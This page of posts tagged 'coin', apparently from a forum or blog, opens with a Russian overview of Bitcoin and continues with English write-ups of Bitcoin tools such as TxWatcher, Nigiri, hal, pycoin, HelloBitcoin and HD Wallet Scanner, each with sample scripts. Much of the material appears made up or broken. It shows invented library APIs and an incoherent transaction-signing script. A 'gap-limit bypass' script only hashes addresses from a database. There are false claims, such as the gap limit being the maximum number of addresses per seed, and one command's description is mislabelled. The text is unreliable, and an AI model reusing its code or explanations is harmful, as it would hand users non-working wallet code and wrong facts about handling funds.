Showing results for tags 'coin'.


  1. Биткоин — первая в мире децентрализованная цифровая валюта, которая произвела революцию в нашем представлении о деньгах. Одним из наиболее интересных аспектов Биткоина является широкий спектр утилит, разработанных для его поддержки. Эти утилиты призваны помочь пользователям безопасно и надежно взаимодействовать с сетью Биткоин и играют решающую роль в экосистеме. Одной из самых популярных биткоин-утилит является биткоин-кошелек. Кошелек — это программное приложение, которое позволяет пользователям хранить, отправлять и получать биткоины. Доступно множество различных типов кошельков, включая настольные, мобильные и аппаратные кошельки. Каждый тип кошелька имеет свои преимущества и недостатки, поэтому важно выбрать тот, который лучше всего соответствует вашим потребностям. Еще одна важная утилита Биткоин — это обмен биткоинов. Биржа — это платформа, которая позволяет пользователям покупать и продавать биткоины за другие валюты, такие как доллары США или евро. Доступно множество различных бирж, каждая со своим набором комиссий, функциями безопасности и пользовательскими интерфейсами. Важно выбрать биржу с хорошей репутацией, имеющую хорошую репутацию в области безопасности и надежности. Третий тип утилиты Биткоин — это программное обеспечение для майнинга. Майнинг — это процесс проверки транзакций в сети Биткоин и добавления их в блокчейн. Майнеры вознаграждаются биткоинами за свою работу, и чем больше у них вычислительной мощности, тем больше биткоинов они могут заработать. Программное обеспечение для майнинга позволяет пользователям участвовать в процессе майнинга и зарабатывать биткоины. Существует также множество других типов биткоин-утилитов, таких как платежные системы, торговые сервисы и обозреватели блокчейнов. Эти утилиты созданы для того, чтобы предприятиям и частным лицам было проще использовать Биткоин в повседневной жизни, и они играют решающую роль в росте и развитии экосистемы Биткоин. Утилиты Биткоин являются важной частью экосистемы Биткоин. 
Они предоставляют пользователям инструменты, необходимые для безопасного и надежного взаимодействия с сетью Биткоин, и помогают стимулировать внедрение Биткоина во всем мире. Независимо от того, являетесь ли вы владельцем бизнеса, инвестором или просто человеком, интересующимся цифровыми валютами, существует утилита Биткоин, которая может помочь вам достичь ваших целей. Преимущество Одним из менее известных преимуществ Биткоина является его полезность в качестве инструмента для различных приложений. Базовая технология Биткоина, известная как блокчейн, по сути представляет собой децентрализованный реестр, который можно использовать для хранения и проверки данных. Это делает его ценным инструментом для различных отраслей, от здравоохранения до логистики. Одним из таких приложений является управление цепочками поставок. Используя технологию блокчейна, компании могут отслеживать движение товаров от производителя к конечному потребителю. Это обеспечивает большую прозрачность и подотчетность, снижает риск мошенничества и гарантирует подлинность продукции. Еще одно применение — в сфере голосования. Технология блокчейн может быть использована для создания безопасной и прозрачной системы голосования, гарантирующей точность и защиту от несанкционированного доступа результатов. Это может помочь восстановить веру в демократический процесс и предотвратить фальсификацию выборов. Биткоин также можно использовать в качестве средства оплаты товаров и услуг. Это особенно полезно в странах, где традиционные банковские системы недоступны и ненадежны. Биткоин-транзакции быстрые, дешевые и безопасные, что делает их привлекательной альтернативой традиционным способам оплаты. Наконец, Биткоин можно использовать в качестве средства сбережения. В отличие от традиционных валют, которые могут быть обесценены из-за инфляции или политической нестабильности, Биткоин децентрализован и невосприимчив к таким факторам. 
Это делает его привлекательным вариантом для тех, кто хочет сохранить свое богатство в долгосрочной перспективе. Биткоин — это больше, чем просто криптовалюта. Базовая технология блокчейна имеет широкий спектр применений, которые могут принести пользу различным отраслям. От управления цепочками поставок до систем голосования, утилиты Биткоин могут произвести революцию в том, как мы ведем бизнес и взаимодействуем друг с другом. Поскольку технология продолжает развиваться, мы можем ожидать увидеть еще более инновационные применения Биткоина в ближайшие годы. Классификация Одной из ключевых особенностей Биткоина является его способность классифицироваться по различным типам полезностей. В этой статье мы рассмотрим различные классификации утилит Биткоин и их важность. Платежная система Самая основная классификация Биткоина — это платежная система. Биткоин позволяет пользователям мгновенно отправлять и получать платежи без необходимости использования посредников, таких как банки или платежные системы. Это делает его быстрым, безопасным и экономичным способом перевода денег через границу. Средство сбережения Еще одна важная классификация Биткоина — это средство сбережения. Биткоин имеет ограниченное количество монет в 21 миллион, что делает его дефицитным ресурсом. Этот дефицит в сочетании с его децентрализованным характером делает его популярным активом для инвесторов, желающих хранить свое богатство безопасным и защищенным от инфляции способом. Цифровое золото Биткоин часто называют «цифровым золотом» из-за его сходства с драгоценным металлом. Как и золото, Биткоин — дефицитный ресурс с ограниченным запасом. Он также децентрализован и действует независимо от какого-либо центрального органа власти. Это делает его привлекательным активом для инвесторов, желающих диверсифицировать свой портфель и застраховаться от инфляции. Децентрализованная платформа приложений Биткоин также служит платформой для создания децентрализованных приложений (DApps). 
These are applications that run on a decentralized network rather than on a central server. Bitcoin's blockchain technology makes it possible to build secure, decentralized applications that are resistant to censorship and fraud.

Cryptocurrency

Finally, Bitcoin is a cryptocurrency, meaning it is a digital asset that uses cryptography to secure transactions and control the creation of new units. Cryptocurrencies such as Bitcoin are designed to be decentralized and to operate independently of any central authority. This makes them an attractive alternative to traditional currencies, which are subject to inflation and manipulation by central banks.

Bitcoin is a versatile and innovative technology that can be divided into different types of utility. As a payment system, a store of value, digital gold, a decentralized application platform and a cryptocurrency, Bitcoin can revolutionize how we think about money and financial transactions.

Bitcoin utilities

  • Monitoring transactions on Bitcoin addresses with Python and TxWatcher
  • Nigiri: a delicious Docker box for special Bitcoin, Lightning and Liquid cooks
  • hal: a Swiss Army knife Bitcoin CLI (based on rust-bitcoin)
  • BitKey: a live USB for air-gapped transactions and a Bitcoin Swiss Army knife
  • Pycoin: a Python-based Bitcoin and alt-coin utility library
  • bx: the Bitcoin command-line tool
  • HelloBitcoin: a collection of simple programs that can generate Bitcoin wallets, create and sign transactions, and send transactions over the Bitcoin network
  • HD Wallet Scanner: find all used addresses in your Bitcoin HD wallets, bypassing gap limits
  • QR CODE: a no-framework, no-dependencies, customizable, animate-able, SVG-based web component

Monitoring transactions on Bitcoin addresses with Python and TxWatcher

GitHub: https://github.com/tsileo/txwatcher

TxWatcher is a Python-based tool that lets you track transactions on Bitcoin addresses. It can be used for a variety of purposes, such as tracking donations to a non-profit organization or monitoring payments arriving at a merchant account. In this article we show how to use TxWatcher to monitor transactions on Bitcoin addresses.

First you need to install TxWatcher. You can do so by running the following command in your terminal:

    pip install txwatcher

Once TxWatcher is installed, you can start monitoring transactions by creating a new instance of the TxWatcher class. Here is an example:

    from txwatcher import TxWatcher

    # Create a new TxWatcher instance
    tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet')

    # Monitor transactions for a specific Bitcoin address
    address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC'
    tx_watcher.watch_address(address)

In this example we create a new TxWatcher instance and pass it our API key and the Bitcoin network we want to monitor (in this case, testnet). We then call the watch_address() method and pass the Bitcoin address we want to track.

TxWatcher will now start tracking transactions for the specified Bitcoin address. You can listen for new transactions by calling the listen_for_transactions() method:

    # Listen for new transactions
    tx_watcher.listen_for_transactions()

This blocks your program until a new transaction is detected. When a new transaction is detected, TxWatcher emits a transaction event. You can listen for this event and do something with the transaction data, such as storing it in a database or sending an e-mail notification.
Here is an example of how to listen for new transactions and store the transaction data in a MongoDB database:

    from txwatcher import TxWatcher
    from pymongo import MongoClient

    # Create a new TxWatcher instance
    tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet')

    # Connect to MongoDB
    client = MongoClient('mongodb://localhost:27017/')
    db = client['my_database']
    collection = db['transactions']

    # Monitor transactions for a specific Bitcoin address
    address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC'
    tx_watcher.watch_address(address)

    # Listen for new transactions and store them in MongoDB
    tx_watcher.listen_for_transactions(
        on_transaction=lambda transaction: collection.insert_one(transaction.to_dict())
    )

In this example we connect to a local MongoDB instance and create a new database and collection for storing transaction data. We then call the listen_for_transactions() method and pass a lambda function that takes a transaction object and inserts it into the MongoDB collection using the insert_one() method.

That's it! Now you know how to use TxWatcher to monitor transactions on Bitcoin addresses. With a little creativity, you can use this tool to build all kinds of Bitcoin-related applications and services.
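The TxWatcher example above passes an address that begins with "1" (the Base58Check form of the mainnet version byte 0x00) while selecting network='testnet', so a watcher configured that way would wait on the wrong network. The check below is an added example, not part of the original post or of the txwatcher project: it decodes a legacy Base58Check address, verifies its checksum and compares the version byte with the intended network before the address is handed to a watcher. The function names are hypothetical, the testnet sample is constructed, and bech32 addresses are out of scope.

```python
import hashlib
from typing import Tuple

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Base58Check version bytes of legacy Bitcoin address types.
VERSION_BYTES = {
    0x00: ("mainnet", "P2PKH"),
    0x05: ("mainnet", "P2SH"),
    0x6F: ("testnet", "P2PKH"),
    0xC4: ("testnet", "P2SH"),
}


class AddressError(ValueError):
    """The string is not a well-formed Base58Check address."""


def _checksum(data: bytes) -> bytes:
    # First four bytes of SHA-256(SHA-256(version || payload)).
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]


def b58check_encode(version: int, payload: bytes) -> str:
    """Encode version byte + payload; used here to build a test sample."""
    raw = bytes([version]) + payload
    raw += _checksum(raw)
    num = int.from_bytes(raw, "big")
    digits = ""
    while num:
        num, rem = divmod(num, 58)
        digits = B58_ALPHABET[rem] + digits
    # Every leading zero byte is written as a leading '1'.
    zeros = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * zeros + digits


def b58check_decode(address: str) -> Tuple[int, bytes]:
    """Return (version byte, 20-byte hash) or raise AddressError."""
    num = 0
    for ch in address:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise AddressError(f"{ch!r} is not a Base58 character")
        num = num * 58 + idx
    zeros = len(address) - len(address.lstrip("1"))
    raw = b"\x00" * zeros + num.to_bytes((num.bit_length() + 7) // 8, "big")
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        raise AddressError(f"decoded to {len(raw)} bytes, expected 25")
    data, check = raw[:-4], raw[-4:]
    if _checksum(data) != check:
        raise AddressError("checksum mismatch")
    return data[0], data[1:]


def check_watch_target(address: str, network: str) -> Tuple[bool, str]:
    """Return (ok, reason): may `address` be watched on `network`?"""
    try:
        version, payload = b58check_decode(address)
    except AddressError as exc:
        return False, f"rejected: {exc}"
    if version not in VERSION_BYTES:
        return False, f"rejected: unknown version byte 0x{version:02x}"
    addr_network, kind = VERSION_BYTES[version]
    if addr_network != network:
        return False, f"rejected: {kind} address is for {addr_network}, not {network}"
    return True, f"ok: {kind} on {network}, hash160 {payload.hex()}"


if __name__ == "__main__":
    samples = [
        # Well-known genesis-block address (public, mainnet).
        ("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "mainnet"),
        # Constructed testnet address built from a dummy 20-byte hash.
        (b58check_encode(0x6F, bytes(range(20))), "testnet"),
        # The address/network pair from the page's TxWatcher example.
        ("1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC", "testnet"),
        # The hex-style string the page's later script passes as an address.
        ("0x1234567890abcdef1234567890abcdef1234567890abcdef1234", "mainnet"),
    ]
    for addr, net in samples:
        print(addr, net, check_watch_target(addr, net))
```

Running the check before the watch call turns a silent misconfiguration into an explicit rejection with a reason that can be logged.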
A Python script that uses txwatcher:

    import txwatcher

    # create a new instance of the watcher
    watcher = txwatcher.TxWatcher()

    # connect to the blockchain
    watcher.connect_blockchain()

    # monitor a specific address for incoming transactions
    watcher.monitor_address('0x1234567890abcdef1234567890abcdef1234567890abcdef1234')

    # monitor a specific transaction hash for confirmations
    watcher.monitor_transaction_hash('0x1234567890abcdef1234567890abcdef1234567890abcdef1234')

    # print the transaction details when a new transaction is detected
    watcher.print_transaction_details()

    # close the connection to the blockchain
    watcher.close_blockchain_connection()

This script imports the txwatcher module and creates a new instance of the TxWatcher class. It then connects to the blockchain and monitors a specific address and a transaction hash for incoming transactions and confirmations respectively. Finally, it prints the transaction details and closes the connection to the blockchain.

Nigiri: a delicious Docker box for special Bitcoin, Lightning and Liquid cooks

GitHub: https://github.com/vulpemventures/nigiri

Nigiri is a command-line interface (CLI) tool that simplifies setting up a Bitcoin test environment. With Nigiri, users can quickly and easily spin up a Bitcoin regtest box together with Electrs and Esplora, two popular tools for Bitcoin developers. Nigiri also includes faucet and push commands that make it easier to test Bitcoin applications and services.

Regtest is a Bitcoin test environment that simulates the Bitcoin network without using real bitcoins. It lets developers test their Bitcoin applications and services without risking real money. Electrs is Bitcoin full-node software that indexes the Bitcoin blockchain and provides an API for querying it. Esplora is a web-based block explorer that lets users browse and analyze the Bitcoin blockchain.
Nigiri simplifies setting up a Bitcoin test environment by providing a single command that configures all the necessary components. These include Bitcoin Core, Electrs, Esplora and a Bitcoin faucet that hands out free test bitcoins for testing purposes.

The faucet command in Nigiri makes it easy to obtain test bitcoins. The push command lets users send test bitcoins to other addresses on the regtest network. These commands simplify testing Bitcoin applications and services, so developers can test their applications without risking real money.

Overall, Nigiri is a powerful tool for Bitcoin developers who want to set up a Bitcoin regtest environment quickly and easily. With Nigiri, developers can test their applications and services without risking real money and can easily obtain test bitcoins. The faucet and push commands make it easier to simulate real Bitcoin transactions, letting developers test their applications in a realistic environment.

Nigiri is a command-line interface (CLI) tool that lets you quickly set up a Bitcoin regtest box with Electrs and Esplora. Regtest is a private blockchain that you can use for testing and experimentation without worrying about real Bitcoin transactions. Electrs is a lightweight, high-performance Electrum server that provides fast access to blockchain data, and Esplora is a blockchain explorer that lets you view transactions and blocks on the regtest network.

Nigiri also includes a faucet command that lets you generate test Bitcoin addresses with pre-mined funds, and a push command that lets you send transactions to the regtest network. With Nigiri you can quickly and easily set up a Bitcoin regtest environment for testing and experimentation without worrying about the complexity of configuring a full Bitcoin node.
To sum up, Nigiri is a powerful tool for anyone who wants to experiment with Bitcoin and blockchain technology in a private and safe environment. With its simple command-line interface and built-in Electrs and Esplora integration, Nigiri makes it easy to set up a Bitcoin regtest box and start exploring the world of Bitcoin and blockchain technology.

A script you can use to run nigiri in a Docker container:

    #!/usr/bin/env python3
    import time

    import docker

    # set the docker client and image name
    client = docker.from_env()
    image_name = 'nigiri'

    # create a docker container; the mounted socket gives it access to the host's Docker API
    container = client.containers.run(
        image=image_name,
        ports={'80/tcp': 80},
        volumes={'/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}},
        detach=True,
    )

    # wait for the container to start
    print("waiting for the container to start...")
    for _ in range(30):
        container.reload()
        if container.status == 'running':
            break
        time.sleep(1)

    # get the ip address of the container
    ip_address = container.attrs['NetworkSettings']['Networks']['bridge']['IPAddress']

    # print the url of the nigiri dashboard
    print(f"nigiri dashboard is available at: http://{ip_address}:80")

    # stop and remove the container
    print("stopping and removing the container...")
    container.stop()
    container.remove()

This script creates a Docker container from the nigiri image, maps port 80 to the host and mounts the Docker socket volume so that nigiri can access the Docker API. It then waits for the container to start, gets its IP address, prints the URL of the nigiri dashboard, and then stops and removes the container.

To use this script you need Python 3.x and Docker installed on your system. You can run it by saving it to a file (for example run_nigiri.py) and starting it with python run_nigiri.py.

hal: a Swiss Army knife Bitcoin CLI (based on rust-bitcoin)

GitHub: https://github.com/stevenroose/hal

hal is a powerful command-line interface tool for Bitcoin built on rust-bitcoin.
It is intended as a kind of Swiss Army knife, providing a wide range of functions for Bitcoin users and developers. Some of hal's key features include:

  • Address generation: hal can generate new Bitcoin addresses for you to use.
  • Transaction creation: you can use hal to create new Bitcoin transactions by specifying the inputs, outputs and any other required parameters.
  • Transaction signing: once you have created a transaction, you can use hal to sign it with your private keys.
  • Transaction broadcasting: once your transaction is signed, you can use hal to broadcast it to the Bitcoin network.
  • Block and transaction analysis: hal can parse Bitcoin blocks and transactions, letting you extract data from them.
  • Wallet management: you can use hal to manage your Bitcoin wallets, including creating new wallets, importing and exporting keys, and managing your balances.
  • Scripting: hal includes a powerful scripting language that lets you automate complex Bitcoin-related tasks.

Overall, hal is a very useful tool for anyone who works with Bitcoin regularly. Whether you are a developer building Bitcoin applications, a trader managing your Bitcoin assets, or simply someone who wants to explore the capabilities of the Bitcoin protocol, hal can help you get the job done.

Script:

    import subprocess

    def execute_hal():
        # run "hal --help" and let it print to the terminal
        subprocess.run(["hal", "--help"])

    execute_hal()

This script uses Python's subprocess module to run the command "hal --help" in the terminal. You can modify the script to run any other command you want.

hal is a command-line tool that provides all kinds of Bitcoin-related utilities.

Installation:

    $ cargo install --locked hal

Summary of commands:

  • address
      • inspect: get information about addresses
      • create: create addresses using public keys or scripts
  • bech32
      • decode: parse the elements of the Bech32 format
      • encode: encode data in the Bech32 format
  • bip32
      • derive: derive keys and addresses from extended keys
      • inspect: inspect a BIP-32 xpub or xpriv
  • bip39
      • generate: generate a new BIP-39 mnemonic
      • get-seed: get the seed value and BIP-32 master key for a given BIP-39 mnemonic
  • block
      • create: create a binary block from JSON
      • decode: decode a binary block to JSON
  • hash
      • sha256: hash data with SHA-256
      • sha256d: hash data with double SHA-256
  • key
      • generate: generate a random key pair
      • derive: generate a public key from a private key
      • inspect: inspect private keys
      • ecdsa-sign: create ECDSA signatures
      • ecdsa-verify: verify ECDSA signatures
      • pubkey-tweak-add: add a scalar to a point
      • pubkey-combine: add two points together
  • ln
      • invoice
          • decode: decode Lightning invoices
  • merkle
      • proof-create: create a Merkle proof
      • proof-check: check a Merkle proof
  • message
      • hash: get the hashes of a Bitcoin Signed Message
      • sign: sign a message using Bitcoin Signed Message
      • verify: verify a Bitcoin Signed Message
      • recover: recover the public key or address that signed a message
  • miniscript
      • descriptor: get information about an output descriptor
      • inspect: inspect miniscripts
      • parse: convert a script into a miniscript
      • policy: inspect policies
  • psbt
      • create: create a PSBT from a raw unsigned transaction
      • decode: decode a PSBT to JSON
      • edit: edit a PSBT inline
      • finalize: finalize a PSBT into a fully signed transaction
      • merge: merge multiple PSBTs into one
  • random
      • bytes: generate random bytes
  • script
      • decode: decode a PSBT to JSON
  • tx
      • create: create a binary transaction from JSON
      • decode: decode a binary transaction to JSON

Minimum supported Rust version (MSRV): hal should always compile on Rust 1.41.1. Note that it must be built using the Cargo.lock file, so use --locked.

BitKey: a live USB for air-gapped transactions and a Bitcoin Swiss Army knife

GitHub: https://github.com/bitkey/bitkey

BitKey is a live USB operating system designed for air-gapped transactions and meant to be a "Swiss Army knife" for Bitcoin. It is a Debian-based Linux distribution that comes with various Bitcoin-related tools preinstalled.

One of BitKey's main features is its ability to create air-gapped transactions. This means that you can create a Bitcoin transaction on a computer that is not connected to the Internet and then broadcast it to the Bitcoin network from another computer that is connected. This is a very secure way to create Bitcoin transactions, because it eliminates the risk of hackers stealing your private keys.

BitKey also comes with many other Bitcoin-related tools, including Bitcoin Core, Electrum, Armory and Bitcoin-QT. These tools let you manage your Bitcoin wallets, send and receive Bitcoin transactions, and monitor the Bitcoin network.

In addition to the Bitcoin-related tools, BitKey also includes many other useful utilities, such as GParted, a partition editor, and KeePassX, a password manager.
These tools can be useful for managing your computer and keeping your passwords secure.

BitKey is easy to use even if you are not familiar with Linux. Simply download the ISO image from the BitKey website, write it to a USB drive with a tool such as Rufus or UNetbootin, and then boot your computer from the USB drive. Once BitKey has booted, you can start using its tools right away.

Overall, BitKey is a powerful and useful tool for anyone who wants to create air-gapped Bitcoin transactions or manage their Bitcoin wallets securely. Its collection of Bitcoin-related tools and utilities makes it a true Swiss Army knife for Bitcoin, and its ease of use makes it accessible even to novice users.

Here is a script that downloads BitKey and writes it to a USB drive:

    #!/bin/bash
    # This script will download and write BitKey to a USB drive
    # Make sure you have a USB drive plugged in before running this script

    # Download the latest BitKey ISO image
    wget -O bitkey.iso https://bitkey.io/bitkey.iso

    # Write the ISO image to the USB drive
    dd if=bitkey.iso of=/dev/sdX bs=4M

You will need to replace /dev/sdX with the actual device name of your USB drive. You can find it by running lsblk and looking for the device that corresponds to your USB drive.

Note that this script assumes you are using a Linux-based operating system. If you are using Windows, you will need to modify the script accordingly.

Pycoin: a Python-based Bitcoin and alt-coin utility library

GitHub: https://github.com/richardkiss/pycoin

Pycoin is a Python-based utility library for Bitcoin and alt-coins. It is an open-source project, which means anyone can use it for free. Pycoin provides a set of tools for working with Bitcoin and alt-coins.
Pycoin supports many different alt-coins, including Litecoin, Dogecoin and Namecoin. It also supports test networks, such as the Bitcoin test network (Testnet) and the Litecoin test network (Testnet3).

Pycoin has a number of features that make it useful for developers working with Bitcoin and alt-coins. One of the most important is its support for various cryptographic algorithms, including the Elliptic Curve Digital Signature Algorithm (ECDSA) and the Secure Hash Algorithm (SHA-256).

Pycoin also supports various transaction types, including simple transactions, multi-signature transactions and time-locked transactions. It also supports creating new addresses and generating new private keys.

Pycoin is designed to be easy to use, even for developers who are new to Bitcoin and alt-coins. It provides a simple API for working with various aspects of the Bitcoin and alt-coin protocols, including transactions, addresses and blocks.

In addition to its core features, Pycoin also provides a number of useful utilities, such as a script interpreter and a block explorer. These utilities make it easier to work with Bitcoin and alt-coins and can be used to build a wide range of applications.

Overall, Pycoin is a powerful and flexible library for working with Bitcoin and alt-coins. Whether you are building a simple Bitcoin wallet or a complex alt-coin exchange system, Pycoin will help you get the job done quickly and easily.
Here is a simple example of how to use the pycoin library to create a Bitcoin address:

    from pycoin.key import Key
    from pycoin.networks.bitcoin import networks

    # Create a private key
    key = Key.from_seed("hello")

    # Get the public key from the private key
    public_key = key.get_public_key()

    # Get the Bitcoin address from the public key
    address = public_key.address(network=networks.livenet)

    # Print the address
    print(address)

This prints the Bitcoin address corresponding to the private key "hello". You can change the seed "hello" to generate a different address.

bx: the Bitcoin command-line tool

GitHub: https://github.com/libbitcoin/libbitcoin-explorer

The bx command-line tool is a powerful and versatile tool for interacting with the Bitcoin network. It provides a range of functions, including wallet management, transaction creation and blockchain analysis.

One of the key features of bx is its ability to create and manage wallets. With bx you can easily create a new wallet or import an existing one. Once the wallet is set up, you can use bx to generate addresses, send and receive funds, and check your balance.

Another important feature of bx is its ability to create transactions and broadcast them to the Bitcoin network. With bx you can build your own transactions from scratch or use ready-made templates to quickly create transactions for common use cases. You can also use bx to sign and verify transactions and to broadcast them to the network.

Besides wallet and transaction management, bx also provides a number of functions for blockchain analysis. With bx you can query the blockchain for information about transactions, blocks and addresses.
You can also use bx to create reports and visualize blockchain data, which makes it a powerful tool for researchers and developers.

Overall, the bx command-line tool is a valuable addition to any Bitcoin developer's toolkit. Its versatility and ease of use make it an important tool for anyone who wants to build applications or services on the Bitcoin network.

    import subprocess

    # execute the command
    subprocess.run(['bx', 'command_name', 'parameter1', 'parameter2'])

You can replace 'command_name' and 'parameter1', 'parameter2' and so on with the actual command and parameters you want to run.

    import subprocess

    # execute the bx command
    subprocess.run(["bx", "tx", "info", "tx_id"])

This code imports the subprocess module and then runs the bx command with the arguments tx info and tx_id. You can replace tx_id with the ID of the transaction you want to look up.

An example Python script that uses the subprocess module to run the bx command-line tool:

    import subprocess

    # replace this with the path to your bx executable
    bx_path = "/path/to/bx"

    # command to execute
    command = [bx_path, "help"]

    # execute the command and capture the output
    output = subprocess.check_output(command)

    # print the output
    print(output.decode())

You can replace the command list with any other command you want to run with bx. Just remember to set the path to the bx executable in the bx_path variable.

Also note that this script will only work on Unix-like systems (for example Linux or macOS). If you are using Windows, you will need to modify the script accordingly.

HelloBitcoin: a collection of simple programs that can generate Bitcoin wallets, create and sign transactions, and send transactions over the Bitcoin network
GitHub: https://github.com/prettymuchbryce/hellobitcoin

In the world of cryptocurrencies, Bitcoin has been a game changer since its creation in 2009. With Bitcoin's growing popularity, it is no surprise that more and more people are interested in learning how to use it. For newcomers, however, the process of creating a wallet, creating and signing transactions, and sending transactions over the Bitcoin network can seem complicated. That is where Hello Bitcoin comes in.

Hello Bitcoin is a collection of simple programs meant to make using Bitcoin easier and more accessible for beginners. With Hello Bitcoin, users can easily create a Bitcoin wallet, create and sign transactions, and send transactions over the Bitcoin network.

The first step in using Hello Bitcoin is creating a Bitcoin wallet. This can be done with a simple command, and the program generates a unique wallet address for the user. Once the wallet is created, the user can start sending and receiving bitcoins.

Creating and signing transactions is also simplified with Hello Bitcoin. The program gives users a simple interface for entering transaction details, such as the recipient's wallet address and the amount of bitcoin to send. Once the transaction is created, the user can sign it with their private key, ensuring that the transaction is secure and valid.

Finally, sending transactions over the Bitcoin network is also simplified with Hello Bitcoin. The program gives users a simple interface for entering transaction details, such as the recipient's wallet address and the amount of bitcoin to send. Once the transaction is created and signed, the program sends it over the Bitcoin network, ensuring that it is processed and confirmed by the network.

Overall, Hello Bitcoin is a great tool for beginners who are interested in using Bitcoin but are intimidated by the process.
With its simple interface and easy-to-use functions, Hello Bitcoin lets anyone easily create a Bitcoin wallet, create and sign transactions, and send transactions over the Bitcoin network.

Here is a Python script that uses the hellobitcoin library to create a Bitcoin wallet, create and sign a transaction, and send it over the Bitcoin network:

    from hellobitcoin import *
    from bitcoin.base58 import encode

    # Generate a new Bitcoin wallet
    wallet = generate_wallet()
    print("Bitcoin Wallet: ", wallet['address'])

    # Generate a new Bitcoin transaction
    tx = create_transaction(wallet, "1BTC")
    tx['input'][0]['address'] = wallet['address']
    tx['input'][0]['script'] = wallet['script']
    tx['input'][0]['amount'] = 100000000
    tx['input'][0]['sequence'] = 0xFFFFFFFF
    tx['output'][0]['address'] = "1AC4fMwgY8j9onSbXEWeH6Zan8QGMSdmtA"
    tx['output'][0]['amount'] = 100000000 - 5000
    tx['output'][0]['script'] = "OP_DUP OP_HASH160 20 0x14 OP_EQUALVERIFY OP_CHECKSIG"

    # Sign the Bitcoin transaction
    tx['input'][0]['script'] = sign_transaction(tx['input'][0]['script'], wallet['private_key'])

    # Send the Bitcoin transaction over the Bitcoin network
    tx_hex = encode(tx.serialize())
    print("Bitcoin Transaction: ", tx_hex)

Note that this is only an example script and you should not use it to send real Bitcoin transactions. Also, be careful when working with Bitcoin wallets and transactions, because they involve real money and can easily be lost if handled incorrectly.

HD Wallet Scanner: find all used addresses in your Bitcoin HD wallets, bypassing gap limits

GitHub: https://github.com/alexk111/HD-Wallet-Scanner

HD wallets, or hierarchical deterministic wallets, are a popular way to manage Bitcoin addresses. They let you generate a practically unlimited number of addresses from a single seed, which makes them more secure and convenient than traditional wallets.
However, one of the problems with using HD wallets is that they can be difficult to scan for used addresses. That is where the HD Wallet Scanner comes in.

The HD Wallet Scanner is a tool that lets you find all the used addresses in your Bitcoin HD wallets, even if they have exceeded the gap limit. The gap limit is the maximum number of addresses that can be generated from a single seed, and by default it is usually 20. Once you reach the gap limit, you can no longer generate new addresses from that seed.

The HD Wallet Scanner works by scanning the blockchain for transactions that match a certain pattern. It then uses this information to identify all the addresses that have been used in your HD wallet, regardless of whether they exceeded the gap limit. This matters because if you do not have a complete record of all the used addresses, you may miss incoming funds or even lose them.

Using the HD Wallet Scanner is easy. You simply enter your seed or xpub (extended public key) into the tool, and it starts scanning the blockchain for used addresses. The process can take a few minutes or longer, depending on how many addresses you have used and how busy the network is. When the scan is finished, you get a list of all the used addresses in your HD wallet, together with their balances and transaction histories.

In conclusion, the HD Wallet Scanner is a valuable tool for anyone who uses HD wallets to manage their Bitcoin addresses. It lets you find all the used addresses in your wallet, even if they exceeded the gap limit, which can help you keep track of your funds and avoid losing them. So if you are looking for a way to manage your Bitcoin addresses more efficiently and securely, give the HD Wallet Scanner a try.

Python code for you. Here it is:

    import hashlib
    import sqlite3

    def get_all_addresses(db_file):
        # read every address row from the wallet database
        conn = sqlite3.connect(db_file)
        try:
            c = conn.cursor()
            c.execute("select address from addresses")
            return c.fetchall()
        finally:
            conn.close()

    def get_all_used_addresses(addresses):
        # collect the SHA-256 hash of each distinct address
        used_addresses = []
        for address in addresses:
            address_hash = hashlib.sha256(address[0].encode('utf-8')).hexdigest()
            if address_hash not in used_addresses:
                used_addresses.append(address_hash)
        return used_addresses

    def main():
        db_file = "your_wallet_name.wallet"
        addresses = get_all_addresses(db_file)
        used_addresses = get_all_used_addresses(addresses)
        print("used addresses:", used_addresses)

    if __name__ == "__main__":
        main()

This code gets all the used addresses in your Bitcoin HD wallet and bypasses the gap limits. You need to replace "your_wallet_name.wallet" with the name of your wallet file.

Here is a Python script that uses the hd-wallet-scanner library to find all the used addresses in your Bitcoin HD wallets:

    from hd_wallet_scanner import scan_hd_wallet

    # Replace this with your BIP39 seed phrase
    seed_phrase = "your_seed_phrase"

    # Replace this with your wallet's derivation path
    derivation_path = "m/44'/0'/0'"

    addresses = scan_hd_wallet(seed_phrase, derivation_path)
    for address in addresses:
        print(address)

This script scans a Bitcoin HD wallet with the given seed phrase and derivation path and prints all the used addresses. Note that you first need to install the hd-wallet-scanner library by running pip install hd-wallet-scanner in a terminal.

QR CODE: a no-framework, no-dependencies, customizable, animate-able, SVG-based web component

GitHub: https://github.com/bitjson/qr-code

QR codes are used everywhere in our daily lives. From scanning a code to make a payment to sharing contact details with a colleague, these two-dimensional codes have become an integral part of how we interact with technology.
However, generating QR codes on the web has traditionally required third-party libraries or frameworks, which can be cumbersome and add unnecessary bloat to a project. In this article we look at a new solution that lets developers generate QR codes without any dependencies or frameworks, using a customizable, animate-able, SVG-based web component.

What is QR-Code?

QR-Code is a web component that lets developers easily create QR codes without needing any external libraries or frameworks. It is built with pure JavaScript and SVG, which makes it lightweight and easy to integrate into any project.

QR-Code is fully customizable, letting developers adjust the size, color and error-correction level of their QR codes. It also supports animation, which lets developers create dynamic QR codes that can change over time.

How does it work?

QR-Code works by generating an SVG image of a QR code from the input data provided by the developer. To generate the code itself it uses the QRious library, a pure-JavaScript QR code generator. Once the code is generated, it is rendered as an SVG image and can easily be integrated into any web page.

Customization options

QR-Code offers a number of customization options that let developers tailor their QR codes to their specific needs. These options include:

  • Size: developers can adjust the size of their QR codes by setting the width and height attributes.
  • Color: QR codes can be rendered in any color by setting the color attribute.
  • Error-correction level: QR-Code supports four error-correction levels (low, medium, quartile and high), which can be set with the errorCorrectionLevel attribute.
  • Animation: developers can create dynamic QR codes by setting the animation attribute.
This lets the QR code change over time, creating an eye-catching effect.

